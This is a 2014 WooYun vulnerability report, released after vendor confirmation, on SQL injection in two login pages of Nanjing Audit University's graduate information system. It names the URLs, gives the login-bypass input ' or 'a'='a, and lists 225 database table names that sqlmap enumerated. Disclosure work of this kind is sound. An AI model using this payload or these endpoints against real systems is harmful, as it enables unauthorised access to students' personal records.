当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083252

漏洞标题:南京审计学院2处SQL注射漏洞

相关厂商:nau.edu.cn

漏洞作者: 路人甲

提交时间:2014-11-14 16:21

修复时间:2014-12-29 16:22

公开时间:2014-12-29 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-29: 细节向公众公开

简要描述:

南京审计学院2处SQL注射漏洞

详细说明:

1.进入研究生信息管理系统 http://gmis.nau.edu.cn/
2.发现有2处登录入口均存在sql注入漏洞
http://gmis.nau.edu.cn/zsgl/login.aspx(以下截图均为此处)
http://gmis.nau.edu.cn/zsgl/Fsgl/login.aspx
3.用户名填写’ or 'a'='a,抛出异常

or.jpg


4.用sqlmap跑下吧,有225多张表,未跑表内数据,估计最少研究生信息都有了

current-db.jpg


dbs.jpg


tables.jpg


漏洞证明:

4.用sqlmap跑下吧,有225多张表,未跑表内数据,估计最少研究生信息都有了

current-db.jpg


dbs.jpg


Database: Gzs_naudata
[225 tables]
+-----------------------+
| a |
| aaaa |
| bdmc |
| bswbxx |
| c_standardCode |
| cgbh |
| common_table_field |
| dm_bklbm |
| dm_bklbm1 |
| dm_bklbm_bs |
| dm_bkxxxs_bs |
| dm_bkxxxs_ss |
| dm_dssx_bs |
| dm_dwxz_bs |
| dm_gdyxdw |
| dm_gdyxdw_bak1114 |
| dm_hxlb |
| dm_hyzk |
| dm_jxl |
| dm_ksfs |
| dm_ksfs_bs |
| dm_ksly |
| dm_ksly_bs |
| dm_lqlb |
| dm_mz |
| dm_xq |
| dm_xsxwdw_bs |
| dm_xsxwdw_bs_bak1114 |
| dm_xwfs_bs |
| dm_xwlx_bs |
| dm_xxfl |
| dm_xyjr |
| dm_xzqh |
| dm_zhxl |
| dm_zhxl_bs |
| dm_zhxw |
| dm_zjlxm |
| dm_zxjh |
| dm_zzmm |
| dtproperties |
| fsksjfxx_ss |
| gxmtzl |
| kmcjtemp |
| kmdz |
| kmstd_ksbh |
| mtylb_bs |
| mtylb_ss |
| sort_xh |
| ssActLog |
| sys_ip |
| sys_user |
| sys_userloginip |
| t_comm_groupmodule |
| t_comm_module |
| t_comm_usergroup |
| t_comm_useringroup |
| temp_xh |
| xk_ml |
| xk_xwzydm |
| xk_yjxk |
| xzdsxx |
| yjfx |
| yxfhmt_bs |
| yxfhmt_bs_add |
| yxfhmt_ss |
| yxfhzxry_lxfs |
| z |
| z_bswb |
| z_bswb2 |
| za |
| zds |
| zjbz |
| zmttz_mtzl |
| zs_bbk |
| zs_bbk_2012 |
| zs_bs_bzsds |
| zs_bs_cscj |
| zs_bs_cscjtmp |
| zs_bs_cscjtmp1 |
| zs_bs_cscjtmp2 |
| zs_bs_cscjtmp2008122 |
| zs_bs_dm_lqgz |
| zs_bs_dsxx |
| zs_bs_fscj |
| zs_bs_fsqjwh |
| zs_bs_fstzsbz |
| zs_bs_jkls |
| zs_bs_jscj |
| zs_bs_jxjlb |
| zs_bs_kcap |
| zs_bs_kcap_tmp |
| zs_bs_kmcj |
| zs_bs_kmcj_dssort |
| zs_bs_kskm |
| zs_bs_kskm2009 |
| zs_bs_kssjsz |
| zs_bs_lqb |
| zs_bs_pgfsyy |
| zs_bs_rxjj |
| zs_bs_tljskm |
| zs_bs_xjybk |
| zs_bs_xxfsbzk |
| zs_bs_xylqgzb |
| zs_bs_yjfx |
| zs_bs_yxjxjjhb |
| zs_bs_yxnzrs |
| zs_bs_yxsh |
| zs_bs_yykgcj |
| zs_bs_yyzgcj |
| zs_bs_zhcjqz |
| zs_bs_zkz |
| zs_bs_zydm |
| zs_bsfsmdqd_tj |
| zs_bswb_fj |
| zs_bswb_order |
| zs_bswbxxb |
| zs_bswbxxb1025bak |
| zs_bswbxxb_bk |
| zs_bszsbmsz |
| zs_cjlr_log |
| zs_cjxg_log |
| zs_dm_bmd |
| zs_dm_jxjlb |
| zs_dsxx |
| zs_dsxx_sort |
| zs_dsxx_sort_tmp |
| zs_dsxx_ss |
| zs_dsxx_tmp |
| zs_dwxx |
| zs_fstzjk |
| zs_fstzsz |
| zs_fstzsz_bs |
| zs_hsszydm |
| zs_jsjbxx |
| zs_jsjbxx_bs |
| zs_jsjbxxbak |
| zs_lqbz |
| zs_sbk |
| zs_sbm |
| zs_sbmysk |
| zs_sbmysktemp |
| zs_ss_cfsq |
| zs_ss_cscj |
| zs_ss_cscjtmp |
| zs_ss_cscjtmp1 |
| zs_ss_cscjtmp2 |
| zs_ss_dm_lqgz |
| zs_ss_fscj |
| zs_ss_fscjxsb |
| zs_ss_fsdkjfgzb |
| zs_ss_fskm |
| zs_ss_fskmtmp |
| zs_ss_fsqjwh |
| zs_ss_fstzsbz |
| zs_ss_ggkcj |
| zs_ss_jcfskm |
| zs_ss_jcfskm_js |
| zs_ss_jkls |
| zs_ss_jscj |
| zs_ss_jskm |
| zs_ss_jskmtmp |
| zs_ss_kcap |
| zs_ss_kcap_jkls |
| zs_ss_kfsz |
| zs_ss_ksdl |
| zs_ss_ksds |
| zs_ss_ksfskm |
| zs_ss_ksjskm |
| zs_ss_kskm |
| zs_ss_kskmk |
| zs_ss_kssjsz |
| zs_ss_lqb |
| zs_ss_lqgzb |
| zs_ss_lqshb |
| zs_ss_pgfsyy |
| zs_ss_qrfskm |
| zs_ss_tjxxb |
| zs_ss_tjxxb_bqlsh |
| zs_ss_tkkm |
| zs_ss_wstjsqcsb |
| zs_ss_wxdcdybj |
| zs_ss_xjybk |
| zs_ss_xxfsbzk |
| zs_ss_xylqgzb |
| zs_ss_yjfx |
| zs_ss_yxcskm |
| zs_ss_yxfsbzk |
| zs_ss_yxjxjjhb |
| zs_ss_yxsh |
| zs_ss_yytlcj |
| zs_ss_zhcjxsb |
| zs_ss_zhcjxsb_mba |
| zs_ss_zhcjxsb_zydm |
| zs_ss_zsjh |
| zs_ss_zydm |
| zs_ss_zykfsz |
| zs_ss_zykfsz1 |
| zs_ss_zyyjfx |
| zs_sstjk |
| zs_tjssqszb |
| zs_tmsmstz |
| zs_tmstjdybj |
| zs_tmsxxb |
| zs_tmsxxb_sqclbj |
| zs_tzgg |
| zs_tzgg_yx |
| zs_xndw |
| zs_xs_zydm |
| zs_xs_zydm_bs_bak1114 |
| zs_xzqh |
| zs_xzqh_bak1114 |
| zs_yzdw |
| zs_yzdw_txdz |
| zs_zyk |
| zslhpy |
| zsml_bs_bzxx |
| zsml_ss_kmdzb |
| zsml_ss_zsjzbzxx |
| zxbz |
| zxkwry |
| zxkwry_yx |
| zxkwry_zskwry |
| zykfszbak |
| zzfsmd |
| zzwy |
+-----------------------+

修复方案:

放个安全狗先

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-11-14 16:30

厂商回复:

谢谢!

最新状态:

暂无